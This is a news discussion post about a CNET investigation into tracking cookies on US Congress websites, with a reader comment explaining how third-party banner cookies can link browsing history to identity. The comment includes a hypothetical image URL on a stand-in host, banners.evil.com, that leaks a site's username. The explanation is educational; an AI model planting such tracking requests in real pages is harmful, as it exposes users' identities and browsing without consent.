More Cookie Investigations

FancyKetchup writes "This time, C|Net is caught up in cookie paranoia with their 'special investigation' into use of cookies on the Senate and House representative websites." From the article: "Sen. John McCain, R-Ariz., for instance, has been a longtime advocate of strict privacy laws to restrict commercial Web sites' data collection practices. In a statement posted on his own Web site, McCain assures visitors that 'I do not use 'cookies' or other means on my Web site to track your visit in any way.' But visiting mccain.senate.gov implants a cookie on the visitor's PC that will not expire until 2035. " Follow up to a story we reported on earlier.

Re:I can't quite make sense of this.

[Mr.+Slippery]

The cookie gives the site access to information which it created in the first place, not any of your personal data.

The trick is that the cookie can be linked to your personal information.

The class "compromising cookie" scenario involves a cookie set by an embedded image from a different server.

Say that Evil, Inc runs a banner server banners.evil.com, which puts ads on kinky.xxx and on yourchurch.org (or maybe just an invisible "web bug" on either site). When you visit kinky.xxx, your browser requests the banner from banners.evil.com, which sets a cookie saying "I went to kinky.xxx and all I got was this lousy cookie". That cookie will be sent along with any request your browser makes to banners.evil.com.

Then you log in to yourchurch.org. Their home page has an image tag with a source like "http://banners.evil.com/spyonme.php?username=your name". Your browser makes this request to banners.evil.com, sending along the cookie that server set eariler. Your browser thus tells Evil, Inc your yourchurch.org username (in the image URL) and the fact the you visited kinky.xxx (in the cookie it).

Evil, Inc phones up your pastor and lets him know so that he can shame you in front of the parish the next Sunday (turns out this is all part of your church's anti-porn crusade).